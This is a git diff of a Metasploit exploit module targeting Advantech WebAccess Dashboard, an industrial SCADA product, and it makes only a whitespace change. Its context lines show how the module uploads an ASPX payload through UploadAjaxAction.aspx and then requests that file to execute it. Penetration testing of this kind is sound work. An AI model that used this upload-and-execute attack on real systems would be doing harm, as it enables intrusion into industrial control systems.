diff --git a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb index 66ea6d2b14..85d688eaf3 100644 --- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb +++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb @@ -90,6 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"') data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"") + res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'), @@ -104,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed") end print_status("#{peer} - Executing payload...") - res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('WADashboard',file_name),